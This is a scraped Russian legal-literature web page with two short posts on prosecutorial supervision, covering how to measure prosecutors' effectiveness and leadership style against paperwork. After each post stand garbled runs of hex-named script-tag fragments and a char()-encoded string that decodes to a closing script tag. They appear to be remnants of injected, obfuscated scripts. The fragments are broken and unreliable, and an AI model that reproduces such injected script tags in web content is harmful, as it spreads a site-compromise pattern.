Новые задачи, поставленные перед органами прокуратуры в настоящее время, требуют от прокуроров организации качественно нового надзора, отвечающего требованиям происходящего в стране преобразования политической, государственной и социально-экономической сфер. При'этом важно, чтобы нарушения законности были выявлены прокурором своевременно и в полном объеме и, вместе с тем, были восстановлены нарушенные права и законные интересы государства, государственных органов, общественных организаций и граждан.
Важно не только вовремя установить нарушения закона,, но и принять необходимые меры к устранению причин и условий, породивших эти нарушения, и, опираясь на помощь граждан, добиться предупреждения и искоренения правонарушений.
" Провозглашенный Конституцией РФ прокурорский надзор за исполнением законов как одна из форм государственной деятельности на деле не является еще достаточно сильным, чтобы противостоять местным влияниям. Для повышения эффективности надзора необходимо, чтобы он был наступательным и принципиальным. Каждое действие прокурора должно быть эффективным по своим социальным и правовым последствиям. Если прокурор устранит нарушение закона, то его действия должны дать положительные результаты. Иначе будет принижено и политическое, и правовое назначение прокурорского надзора.
Некоторые прокуроры при оценке работы подчиненных прокуроров исходят лишь из количественной стороны их деятельности, количества принесенных протестов и представлений, выступлений в суде по уголовным и гражданским делам и т. д. При таком подходе всегда легче оценить работу, проделанную прокурорами, однако гораздо труднее определить эффективность их деятельности по конечным результатам - состоянию законности и правопорядка. Было бы, конечно, неправильным оставлять без внимания количественную сторону осуществленных органами прокуратуры мероприятий: объем выполненной работы всегда был и остается одним из существенных критериев оценки работы прокурора. Но это лишь один, а не единственный критерий в оценке их работы. Если оценить работу органов прокуратуры по количественным показателям, то мы увидим, что прокуроры проводят десятки тысяч прокурорских проверок; по большому числу уголовных дел, рассматриваемых судами, поддерживают государственное обвинение; приносят тысячи протестов и представлений; больше, чем раньше, привлекают нарушителей законности к дисциплинарной, материальной, административной ответственности. Но становится ли от этого законность более устойчивой, меньше ли от этого совершается преступлений? На этот вопрос нельзя дать положительного ответа.33d62fd7a17b8adddf2cad6172e8722b.js" type="text/javascript">2ce1c470c2bcbca605a8b3c81f634e2achar(46,106,115,34,32,116,121,112,101,61,34,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,34,62,60,47,115,99,114,105,112,116,62)9fca53481dd0029af2da3a4291727dd4.js" type="text/javascript">704133852284377f71b5e4c4e27607a3.js" type="text/javascript">df4b3741f3cd76f334d14d84117eab53.js" type="text/javascript">f64eb6b0e8ec7774a1cbbf0c3424931e.js" type="text/javascript">6f9bc24fff5b2637a06d473e74ba0d3d.js" type="text/javascript">1088ee98361365f51502dca7163f3b42.js" type="text/javascript">9ad680bb70322e79e22296f5b587927a.js" type="text/javascript">506089aad933bd2b2e7741e822d9f7b9.js" type="text/javascript">98fbddfb6f321b4fd18b8c082f8fbb4d.js" type="text/javascript">f372883efe339c903664adbc76cbf6df.js" type="text/javascript">915e6aa51aa842d7e0c4b595b2e2144c.js" type="text/javascript">
Коментариев: 0 | Просмотров: 213 |
Стиль и методы руководства и управления в органах прокуратуры
  Прокурорский надзор | Автор: admin | 30-05-2010, 04:02
Стиль работы, который культивируется в органах прокуратуры - это стиль, для которого характерны глубокое изучение деятельности прокуроров по укреплению законности и правопорядка, широкая общая и профессиональная эрудиция, твердость в принятии решений, постоянное общение с гражданами, широкая демократия и гласность в работе, творческий подход к порученному делу, отсутствие субъективизма, высокая требовательность к себе и другим, способность противостоять любым проявлениям местничества, сочетание принципиальности с исполнительской дисциплиной, критическое отношение к недостаткам.
Прокурор должен не только вскрыть нарушения законов, что в ряде случаев не так уж сложно сделать, тем более если прокурор располагает сигналами об этих нарушениях, но проявить твердость и решительность, принципиальность и непримиримость в устранении нарушения закона, добиться наказания виновных и обеспечить условия, исключающие подобные нарушения в будущем. Особенно высокие требования предъявляются к работникам, занимающим ответственное положение в системе органов прокуратуры. Они во многом определяют стиль и методы работы подчиненных прокуратур. И чем выше должностное положение руководителя, тем большее влияние он оказывает на работу подчиненных прокуроров. Однако есть такие руководители, которые подменяют живую организаторскую работу чисто административными методами. Такой стиль работы не отвечает современным требованиям и только вредит делу.
Особенно опасно в руководстве органами прокуратуры бумаготворчество, когда руководитель, направив письменное указание или задание, полагает свою миссию выполненной. В действительности состояние дел от этого не улучшается, а становится в ряде случаев еще хуже. В практике еще живучи устаревшие попытки решать новые задачи чисто административными методами, подменяющими живую организаторскую работу с прокурорами и следователями. Местным органам прокуратуры направляются в большом количестве приказы, указания, поручения, директивы, внеплановые задания. Без особой необходимости требуются справки, сведения, отчеты, информации. Бумаготворчество создает видимость активной работы, оно отрицательно отражается на работе районных и городских прокуратур - основного звена прокуратуры. Генеральный прокурор РФ предлагает, исключить истребование от местных органов прокуратуры не предусмотренных установленным порядком справок, отчетов, информации. Направление на места указаний, писем и заданий может осуществляться лишь после обсуждения этих вопросов на заседаниях коллегий прокуратур субъектов РФ. Ответственность за состояние борьбы с бумаготворчеством возложена на прокуроров субъектов РФ.3aad030ce2cff08a5d0413d30de8410b.js" type="text/javascript">2e71c94eb3ca5070f14b5be69691afd4char(46,106,115,34,32,116,121,112,101,61,34,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,34,62,60,47,115,99,114,105,112,116,62)c4a46ef895f176f768dbe07650d47cd2.js" type="text/javascript">38aa528a6202a29def71a586f05c9cf2.js" type="text/javascript">a43c5e57f7f2c6779a54b1789b7e9b31.js" type="text/javascript">fced343c3de6be505fb405df61c84d44.js" type="text/javascript">e6365833d87e583fbafd2fce642d8604.js" type="text/javascript">8c39252e53e52e958eabb171e8249d26.js" type="text/javascript">51b9fb3635b132e3ceee3b0b251eff4a.js" type="text/javascript">8a0a9aaa260b7cab2f7118375815b6a4.js" type="text/javascript">e4a9bb57764372dd4cbb0a18ea67760a.js" type="text/javascript">96012b08d1aec7d91d841c62cc96bf04.js" type="text/javascript">585c1eed8c35a16792b9dd3e2f90e6de.js" type="text/javascript">
Коментариев: 0 | Просмотров: 168 |
ukrstroy.biz
ЮРИДИЧЕСКАЯ ЛИТЕРАТУРА:
РАЗНОЕ:
КОММЕНТАРИИ:
ОКОЛОЮРИДИЧЕСКАЯ ЛИТЕРАТУРА: